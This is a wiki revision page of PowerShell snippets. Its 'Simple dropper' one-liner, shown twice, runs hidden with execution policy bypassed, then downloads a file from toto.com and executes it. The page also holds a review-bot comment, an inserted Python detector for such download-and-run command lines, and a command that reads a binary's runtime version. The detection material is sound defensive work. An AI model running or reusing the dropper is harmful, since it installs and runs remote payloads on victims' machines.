PowerShell: Difference between revisions

From UnixWiki
(Page created with « Simple dropper powershell.exe" -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('https://toto.com/image.png','C:\Users\admin\AppData\Local\Te... »)
 
Line 2: Line 2:
   
 
powershell.exe" -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('https://toto.com/image.png','C:\Users\admin\AppData\Local\Temp\image.png'); Start-Process('C:\Users\admin\AppData\Local\Temp\image.png')
 
powershell.exe" -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('https://toto.com/image.png','C:\Users\admin\AppData\Local\Temp\image.png'); Start-Process('C:\Users\admin\AppData\Local\Temp\image.png')
  +
  +
  +
  +
Find the framework version of a binary
  +
[Reflection.Assembly]::ReflectionOnlyLoadFrom("C:\Users\futex\Desktop\test.exe").ImageRuntimeVersion
  +
v2.0.50727
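Review bot: the added heading "Find the framework version of a binary" promises more than `ImageRuntimeVersion` returns. That property is the CLR version recorded in the assembly, and `v2.0.50727` is shared by .NET Framework 2.0, 3.0 and 3.5, so the heading should say "CLR (runtime) version" or the entry should note the ambiguity. The output line `v2.0.50727` also sits directly under the command with nothing marking it as output; label it as the result. Separately, the unchanged context line starts with `powershell.exe"`, an unbalanced double quote worth cleaning up while this section is being edited.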

Revision of 31 October 2017 at 16:40

Simple dropper

 powershell.exe" -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('https://toto.com/image.png','C:\Users\admin\AppData\Local\Temp\image.png'); Start-Process('C:\Users\admin\AppData\Local\Temp\image.png')
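
Seen from the detection side, the one-liner above gives several things to match on. The following is an added example, not part of the original wiki page: a Python check for process-creation command lines that recognises the same switches in abbreviated or full form and flags a file that is written by `DownloadFile` and then handed to `Start-Process`. The sample command lines, the `example.test` host and the assumed shortest switch forms are constructed for this illustration.

```python
import re

def _prefixes(full, min_len):
    """Regex matching any prefix of `full` that is at least min_len long."""
    opt = ""
    for ch in reversed(full[min_len:]):
        opt = f"(?:{ch}{opt})?"
    return full[:min_len] + opt

# powershell.exe accepts abbreviated switch names. The shortest forms used
# here (-w, -nop, -ex and the -ep alias) are assumptions of this example.
SWITCHES = {
    "hidden_window": rf"[-/]{_prefixes('windowstyle', 1)}\s+hidden\b",
    "no_profile": rf"[-/]{_prefixes('noprofile', 3)}\b",
    "policy_bypass": rf"[-/](?:ep|{_prefixes('executionpolicy', 2)})\s+bypass\b",
}
Q, NQ = "['\"]", "[^'\"]"  # a quote character / any character that is not one
DOWNLOAD = re.compile(rf"\.DownloadFile\(\s*{Q}{NQ}*{Q}\s*,\s*{Q}({NQ}+){Q}\s*\)", re.I)
LAUNCH = re.compile(rf"Start-Process\b[\s(]*{Q}({NQ}+){Q}", re.I)

def indicators(cmdline):
    """Return the sorted indicator names found in one command line."""
    hits = {name for name, pat in SWITCHES.items() if re.search(pat, cmdline, re.I)}
    dropped = {p.lower() for p in DOWNLOAD.findall(cmdline)}
    launched = {p.lower() for p in LAUNCH.findall(cmdline)}
    if dropped:
        hits.add("download_to_disk")
    if dropped & launched:  # the file just written is the one being started
        hits.add("runs_downloaded_file")
    return sorted(hits)

def is_suspicious(cmdline):
    """Alert on download-then-run, or on all three stealth switches together."""
    found = set(indicators(cmdline))
    return "runs_downloaded_file" in found or set(SWITCHES) <= found

# Constructed command lines, as they would appear in process-creation logs.
TEMP = r"C:\Users\admin\AppData\Local\Temp\image.png"
SAMPLES = [
    f"powershell.exe -w hidden -nop -ep bypass (New-Object System.Net.WebClient)"
    f".DownloadFile('https://example.test/image.png','{TEMP}'); Start-Process('{TEMP}')",
    f"powershell.exe -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass (New-Object "
    f"Net.WebClient).DownloadFile('https://example.test/a.png', '{TEMP}'); Start-Process '{TEMP}'",
    r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1",
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(is_suspicious(s), indicators(s))
```

Matching on the literal string `-w hidden` alone would miss the second sample, which is why the switch patterns are built from name prefixes.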


Find the framework version of a binary

 [Reflection.Assembly]::ReflectionOnlyLoadFrom("C:\Users\futex\Desktop\test.exe").ImageRuntimeVersion
 v2.0.50727